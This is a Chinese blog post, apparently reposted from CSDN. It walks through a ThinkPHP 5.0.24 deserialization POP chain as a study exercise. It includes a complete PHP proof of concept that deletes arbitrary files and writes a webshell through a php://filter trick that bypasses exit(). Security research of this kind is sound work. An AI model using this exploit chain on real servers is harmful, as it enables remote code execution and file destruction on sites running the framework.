文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Thinkphp5.0.24 pop链子学习

2023-10-02 19:21

关注

目录

前言:

任意删除文件

poc

恶意文件上传

 三处存在__call漏洞可能

绕过getRelationData方法中的三个条件

调用__call之后的操作

利用php为协议来绕过exit();?>

poc


前言:

下载地址:下载:ThinkPHP5.0.24核心版 - ThinkPHP框架

利用的phpstudy+PhpStorm搭建的debug环境。

首先在app\index\controller下的index.php设置一个传入点。

index.php

一开始接触,感觉最好找一个链子,debug一下,一步一步跟,不然直接自己找的话会看的头疼。

任意删除文件

在Windows.php的__destruct中。

 跟进一下removeFiles。

private function removeFiles()    {        foreach ($this->files as $filename) {            if (file_exists($filename)) {                @unlink($filename);            }        }        $this->files = [];    }

 大概意思是对files遍历,将file赋值给filename,跟一下file。

发现file可控,然后看一下file在哪个类里。

发现Windows继承了 Pipes。

poc

下个断点,很容易看清其走向。

 

 

 然后便会发现1.txt已经被删除。

恶意文件上传

file_exists搭配对象可以跳到__toString。

 在Model.php的__toString中,进入tojson然后跟进,到toArray()。

    public function __toString()    {        return $this->toJson();    }    public function toJson($options = JSON_UNESCAPED_UNICODE)    {        return json_encode($this->toArray(), $options);    }

 三处存在__call漏洞可能

$item[$key] = $relation->append([$attr])->toArray();$bindAttr = $modelRelation->getBindAttr();$item[$key] = $value ? $value->getAttr($attr) : null;

找一下可控变量,$value可控,往上边跟一下。

$value = $this->getRelationData($modelRelation);

$value是在getRelationData中返还,跟进看一下。

$value = $this->parent;

看一下parent是否可控,发现可控,看一下if条件。

三个条件:

$this->parent!$modelRelation->isSelfRelation()get_class($modelRelation->getModel()) == get_class($this->parent)

第一个:parent可控。

第二个:

 可控

第三个:跟进getModel函数

 query可控,然后又调用了getModel,再跟进,在thinkphp\library\think\db\Query.php中发现getModel方法。

 返还model,参数可控。

绕过getRelationData方法中的三个条件

三个条件都可以满足,可以进入if条件。

再看下边代码中的$modelRelation参数。

$value = $this->getRelationData($modelRelation);

$modelRelation被relation控制,relation被Loader::parseName控制,跟一下。

发现其只是一个大小写变化,不会改变name参数,因为$name可控,所以$relation可控。

if (method_exists($this, $relation)) {               $modelRelation = $this->$relation();               $value         = $this->getRelationData($modelRelation);

想进入if语句,需要满足这个method_exists,则需要将$relation设定为$this中存在的方法,relation可以控制,this指的是Model这个类,看一起其中哪一个方法返回参数可以直接控制。

发现了getError方法,且返回的error参数可以直接控制。

error参数的值刚好直接可以返还给$modelRelation。

$modelRelation = $this->$relation();

这里的relation()可以直接当作getError(),返还error的值,所以$modelRelation=$error

想进入改语句,需要先解决前边几个if条件。

if (method_exists($modelRelation, 'getBindAttr'))$bindAttr = $modelRelation->getBindAttr()if ($bindAttr)

下边的一个if语句刚好就是modelRelation的getBindAttr方法返回的值,跟一下getBindAttr。

在OneToOne.php发现该方法,并且bindAttr可控,第二个if条件也可以过了。

    public function getBindAttr()    {        return $this->bindAttr;    }

OneToOne是一个抽象类,且OneToOne类是Relation类的派生类,然后找一下谁继承了OneToOne,找到了class HasOne extends OneToOne,HasOne继承了OneToOne。可以直接让让$modelRelation的值为HasOne,可以满足getRelationData方法中if第三个条件的getModel方法,并且其中也有bindAttr可控。

然后进入if (isset($this->data[$key]))的else条件便可以调用__call方法。

调用__call之后的操作

public function __call($method, $args)    {        if (in_array($method, $this->styles)) {            array_unshift($args, $method);            return call_user_func_array([$this, 'block'], $args);        }        if ($this->handle && method_exists($this->handle, $method)) {            return call_user_func_array([$this->handle, $method], $args);        } else {            throw new Exception('method not exists:' . __CLASS__ . '->' . $method);        }    }}

call函数中in_array的$method, $this->styles两个参数可控,可以进入if语句,然后可以实现block方法,跟进一下block。

直接到了write方法,发现handel可控,找一个存在可控write方法的类利用。 

 $this->handler可控,再找一下可以利用的set方法。

在thinkphp\library\think\cache\driver\File.php中发现set且存在一个写入文件的操作。

public function set($name, $value, $expire = null)    {        if (is_null($expire)) {            $expire = $this->options['expire'];        }        if ($expire instanceof \DateTime) {            $expire = $expire->getTimestamp() - time();        }        $filename = $this->getCacheKey($name, true);        if ($this->tag && !is_file($filename)) {            $first = true;        }        $data = serialize($value);        if ($this->options['data_compress'] && function_exists('gzcompress')) {            //数据压缩            $data = gzcompress($data, 3);        }        $data   = "\n" . $data;        $result = file_put_contents($filename, $data);        if ($result) {            isset($first) && $this->setTagItem($filename);            clearstatcache();            return true;        } else {            return false;        }    }

首先看一下filename和data是否可控。

$filename = $this->getCacheKey($name, true);

filename由getCacheKey决定,跟一下getCacheKey。

$filename = $this->options['path'] . $name . '.php';

filename类型后缀为php,前边的options['path']和name可控。

 很明显可以看出$data=$value=$sessData=$newline=ture,所以data不可控,直接这样写入文件行不通,但在后边的setTagItem方法中,再一次调用了set方法。

    protected function setTagItem($name)    {        if ($this->tag) {            $key       = 'tag_' . md5($this->tag);            $this->tag = null;            if ($this->has($key)) {                $value   = explode(',', $this->get($key));                $value[] = $name;                $value   = implode(',', array_unique($value));            } else {                $value = $name;            }            $this->set($key, $value, 0);        }    }

此时$key和$value均可控。

利用php为协议来绕过exit();?>

利用php://filter中string.rot13过滤器去除”exit”。string.rot13的特性是编码和解码都是自身完成,利用这一特性可以去除exit。在经过rot13编码后会变成,前提是PHP不开启short_open_tag。

但这次遇到的和平常的不太一样,本地尝试一下如何才能绕过。

\n" . $content1;file_put_contents($filename,$data);?>

当我前边加一个a时。

 当加到三个a时,发现成功。

 

 

所以要使用伪协议绕过时,需要前方加入字符来使其可以进行base64解码。

第二次file_put_contents($filename, $data);时的filename和data数据基本一样,所以我又本地试了一下。

\n" . $content;echo $data;file_put_contents($filename,$data);?>

这次需要用到php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgcGhwaW5mbygpOz8+IA==/../1.php,之前的payload无法成功。

php的php://filter/convert.iconv.UTF8.UTF-7这种filter可以用来转换编码,和linux系统中的iconv命令一致,可以用来转xml进行xxe-waf绕过。

成功后便可以开始写exp,我写了好多次才成功。

首先先把进入tostring那一部分写出来。

files = [];    }}

给files赋值成对象,tostring在Model中,但Model是一个抽象类,无法直接实例化,找一下Model的继承类,然后回头看一下Model中都需要改哪一些参数。

首先是append的key最后要赋值给$relation,然后还会将relation当作方法利用返回$modelRelation所以要让append = ['getError'],紧接着就是判断$modelRelation中是否有getBindAttr方法。我们做的操作是给getError中返还的error参数赋值成HasOne()对象,让$modelRelation=new HasOne(),因为HasOne继承了抽象类OneToOne,且其中存在可控的getBindAttr方法及参数bindAttr。

然后就到了给$value赋值,value是跳到call的关键点,到getRelationData,让parent=new Output(),Relation抽象类中的$selfRelation=false,此时便可使value等于new Output()。

$bindAttr = $modelRelation->getBindAttr();

 getBindAttr方法是OneToOne中的,返还的是bindAttr,这里给bindAttr赋值=["no","1"],可以绕过if (isset($this->data[$key])),直接进入else,然后再进入Output中的call方法。

对call方法分析,首先是进入第一个if条件,in_array($method, $this->styles)返回真,因为method是从Mode中的$attr直接赋值过来的,所以使method相等in_array即可返回真,$attr是$bindAttr的键值,调试一下。

 发现method为getAttr,所以令$this->styles='getAttr'即可。

后边就是绕过死亡函数,上边已经讲过了,就不再说了。

poc

files = [new Pivot()];    }}namespace think;use think\model\relation\HasOne;use think\console\Output;use think\db\Query;abstract class Model{    protected $append = [];    protected $error;    public $parent;    protected $query;    function __construct()    {        $this->append=['getError'];        $this->error=new HasOne();        $this->query=new Query();        $this->parent=new Output();    }}namespace think\model;use think\Model;class Pivot extends Model{}namespace think\model\relation;use think\model\Relation;abstract class OneToOne extends Relation{ # OneToOne抽象类    function __construct(){        parent::__construct();    }}// HasOneclass HasOne extends OneToOne{    protected $bindAttr = [];    function __construct(){        parent::__construct();        $this->bindAttr = ["no","123"];    }}namespace think\model;use think\db\Query;abstract class Relation{    protected $selfRelation;    protected $query;    function __construct(){        $this->selfRelation = false;        $this->query= new Query();    }}namespace think\db;use think\console\Output;class Query{    protected $model;    function __construct(){        $this->model = new Output(); //让其与parent一直,通过getRelationData的第三个条件    }}namespace think\console;use think\session\driver\Memcache;class Output{    private $handle = null;    protected $styles = [];    function __construct()    {        $this->styles = ['getAttr'];        $this->handle=new Memcache();    }}namespace think\session\driver;use think\cache\driver\File;class Memcache{    protected $handler = null;    function __construct()    {        $this->handler = new File();    }}namespace think\cache\driver;class File{    protected $options = [];    protected $tag;    function __construct()    {        $this->options = [            'expire' => 0,            'cache_subdir' => false,            'prefix' => '',            'path'=>'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydmZW5nJ10pOz8+IA==/../feng.php',            'data_compress' => false,        ];        $this->tag = true;    }    public function Getfilename()    {        $name = md5('tag_' . md5($this->tag));        $filename = $this->options['path'];        $pos = strpos($filename, "/../");        $filename = urlencode(substr($filename, $pos + strlen("/../")));        return $filename . $name . ".php";    }}use think\process\pipes\Windows;echo base64_encode(serialize(new Windows()));echo "\n";$a = new File();echo $a->Getfilename();

 传参后直接访问文件,文件名就是exp中打印出来的文件名

另一个rce链子因为环境问题一直没复现成功,等之后再加吧。

感觉自己太菜了,就这么一点代码,跟了一整天才搞完。

参考文章:

(7条消息) Thinkphp 5.0.24反序列化漏洞导致RCE分析_浔阳江头夜送客丶的博客-CSDN博客_thinkphp v5.0.24 漏洞

(7条消息) thinkphp5.0.24反序列化链子分析_XiLitter的博客-CSDN博客_thinkphp v5.0.24

来源地址:https://blog.csdn.net/akxnxbshai/article/details/127416166

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯